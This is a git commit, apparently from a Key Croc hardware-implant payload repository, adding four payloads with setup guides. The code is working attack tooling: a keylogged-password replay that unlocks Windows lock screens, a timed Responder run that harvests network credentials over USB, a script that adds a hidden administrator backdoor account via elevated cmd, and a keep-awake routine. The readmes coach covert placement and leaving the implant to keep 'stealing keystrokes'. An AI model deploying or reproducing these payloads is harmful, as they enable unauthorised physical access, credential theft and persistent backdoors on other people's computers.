Merge pull request #4 from saintcrossbow/master

Skeleton Key - Auto Creds Byepass
pull/10/head
Darren Kitchen 2020-07-01 12:08:04 -07:00 committed by GitHub
commit 4e1811fa3a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 246 additions and 0 deletions

View File

@ -0,0 +1,42 @@
# Skeleton Key
### Deploy to target, come back later to unlock automatically - no checking of logs necessary
---
Arm the Key Croc with an automatic lockpick for Windows 10! After preparing the Key Croc for deployment, place it on a target with a lock screen. Once the target unlocks the PC, their first entry into the Key Croc will be their password. The Skeleton Key payload listens for your secret command, and then unlocks the computer automatically with that password.
Like most skeleton keys, this will not be 100% reliable. The target may enter in the wrong password, or maybe drum on the keys before logging in.
The payload was tested on Windows 10 for both PIN and passwords.
*Setup*
1. Connect the Key Croc and place into arming mode
2. Save offline and then delete all logs in the loot directory
3. Place both the `skeletonkey.txt` and `skeletonagain.txt` in the payloads directory
4. Optionally change the MATCH string to a unique passphrase of your choice
5. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Ensure the target is on a lock screen
2. Remove target keyboard, place the Key Croc on the USB, and connect keyboard to Key Croc when LED is white
3. Cross your fingers and leave
*Turn Skeleton Key*
You get two shots at it! Afterwards, just analyze the log file.
1. Do not disconnect the Key Croc
2. Enter an incorrect password so you receive "The PIN / password is incorrect - try again" message with the OK button. _Do not click the OK button_ - instead...
3. Type the secret phrase `skeletonknock`
4. Didn't work? They may have used the mouse to get to the password screen. Repeat step #2 and then try `skeletonagain`
5. Still no luck? Looks like it isn't your day, but next time you should have better luck. Open the log on a different PC or via SSH to get the password.
*Now* remove the Key Croc and be on your merry way
*Why SkeletonKnock? I thought this was called _skeleton key_*
You're right! But I thought it less likely for anyone to type `skeletonknock`.
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.

View File

@ -0,0 +1,15 @@
# Title: SkeletonAgain
# Description: Plays back last likely password - this time assuming logged in with mouse
# Author: SaintCrossbow
# Version: 1.0
# Category: Bypass
#
# Usage: Enter an invalid key, press enter, type "skeletonagain" to enter the last password
MATCH skeletonagain
QUACK ENTER
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 25 | awk -F 'ꬾ' '{print $1}')
QUACK ENTER

View File

@ -0,0 +1,15 @@
# Title: SkeletonKey
# Description: Plays back last likely password
# Author: SaintCrossbow
# Version: 1.0
# Category: Bypass
#
# Usage: Enter an invalid key, press enter, type "skeletonknock" to enter the last password
MATCH skeletonknock
QUACK ENTER
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK ESCAPE
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 26 | tail -c 25 | awk -F 'ꬾ' '{print $1}')
QUACK ENTER

View File

@ -0,0 +1,32 @@
# Timed Responder Attack
### Hang back for a few extra minutes and collect network credentials
---
After you've attached the Key Croc, why not take the opportunity to try for some network credentials? Start with your MATCH phrase and a responder attack runs for the total minutes you specify. You'll want to hang around for completion though: the target will briefly lose keyboard connection twice. Afterwards you can leave it behind to continue to quietly gather keystrokes.
The payload was tested on Windows 10.
*Setup*
1. Connect the Key Croc on your PC in ARMING mode
2. If you haven't already, get the additional tools using the INSTALL_EXTRAS script
3. Place `timedresponder.txt` in the payloads directory
4. Change the `GATHER_FOR` variable to the number of seconds to run responder
5. Optionally change the MATCH string to a unique passphrase of your choice
6. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. Look around slyly and make sure you are in the clear for a few minutes
3. Start responder by typing `__responder`
4. The Key Croc will go into both HID and RNDIS mode, indicated by LED magenta
5. While responder is running, the LED will flash with a single yellow blink
6. The logs will be copied to /root/loot, indicated by a fast white blink
7. A brief LED flash of green means your attack is complete.
Take the croc with you, or leave it behind to continue stealing keystokes.
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.

View File

@ -0,0 +1,31 @@
# Title: Start responder for n minutes while still being in keyboard mode
# Note: Not fully covert - allow for brief keyboard outage
# Author: Saint Crossbow
# Version: 1.0
MATCH __responder
# Gather for however many minutes (e.g. 120 = 2 minutes)
GATHER_FOR=120
echo "[*] Starting attack"
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET RNDIS_SPEED_2000000 &
sleep 15
LED ATTACK
/tools/responder/Responder.py -I usb0 -f -w -r -d -F &
bpid=$!
sleep $GATHER_FOR
LED CLEANUP
echo "[*] Stopping attack"
kill $bpid
wait $bpid
LED FINISH
cp /tools/responder/logs/*.log /root/loot/
ATTACKMODE HID
sleep 2
LED OFF

View File

@ -0,0 +1,30 @@
# Back Door Account
### Add an account to an unlocked PC before the keystrokes are caught
---
Simple script that adds an administrative user for later access. Only works, of course, if the PC is unlocked. However this is a nice complement to the SkeletonKey payload: just add the new user when you unlock the PC.
The payload was tested on Windows 10.
*Setup*
1. Connect the Key Croc and place into arming mode
2. Place `addadmin.txt` in the payloads directory
3. Change the `BACKDOOR_USER` variable to something that will blend into the environment
4. Change the `BACKDOOR_PASS` variable to a reasonably strong password
5. Optionally change the MATCH string to a unique passphrase of your choice
6. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. If you are lucky enough to find yourself at an unlocked screen, type `__addadmin`
3. With some luck, your user name and password will be added
*Cleanup*
1. Remove the user from the admin group: `net localgroup administrators officeadmin /delete`
2. Remove the user from the system: `net users officeadmin /delete`
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.

View File

@ -0,0 +1,26 @@
# Title: Add a backdoor user to access PC later (assuming PC is unlocked)
# Author: Saint Crossbow
# Version: 1.0
MATCH __addadmin
LED ATTACK
BACKDOOR_USER="officeadmin"
BACKDOOR_PASS="changethis"
sleep 2
Q GUI r
Q STRING "cmd"
Q CTRL-SHIFT ENTER
sleep 2
Q ALT Y
sleep 1
Q STRING "net user /add $BACKDOOR_USER $BACKDOOR_PASS"
Q ENTER
Q STRING "net localgroup administrators $BACKDOOR_USER /add"
Q ENTER
Q STRING "exit"
Q ENTER
LED FINISH
sleep 1
LED OFF

View File

@ -0,0 +1,25 @@
# Keep Alive
### Don't let the PC fall asleep
---
Like having a mouse wiggler on for your Key Croc, except with keys! Unlike a regular mouse wiggler, this will constantly press Control - so typing while it is active is not recommended.
The payload was tested on Windows 10. It may be run with seconds specified as a parameter while in SSH (just remove the MATCH).
*Setup*
1. Connect the Key Croc and place into arming mode
2. Place `keepalive.txt` in the payloads directory
3. Change the `TOTAL_SEC` variable to increase time - default is an hour.
4. Optionally change the MATCH string to a unique passphrase of your choice
5. Eject the Key Croc safely
The Key Croc is ready for deployment.
*Deploy*
1. Connect the Key Croc to target in attack configuration
2. Type `__staylive` to start the keep awake routine: it will flash yellow while it is active
*Whats up with the name SaintCrossbow?*
Most of it is because it wasnt taken. Other than that, Im a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just cant help but think that crossbows are cool.

View File

@ -0,0 +1,30 @@
# Title: Keep the PC from locking - default 1 hour
# When executed from command line without MATCH can specify time
# Author: Saint Crossbow
# Version: 1.0
MATCH __staylive
LED ATTACK
if [ $# -eq 0 ]
then
TOTAL_SEC=3600
echo "Default time of 60 minutes used"
else
echo "Running for total $1 seconds"
TOTAL_SEC=$1
fi
echo $TOTAL_SEC
i=1
while [ "$i" -le "$TOTAL_SEC" ]; do
echo -n "."
Q CONTROL
sleep 1
i=$(($i + 1))
done
echo
LED FINISH
sleep 1
LED OFF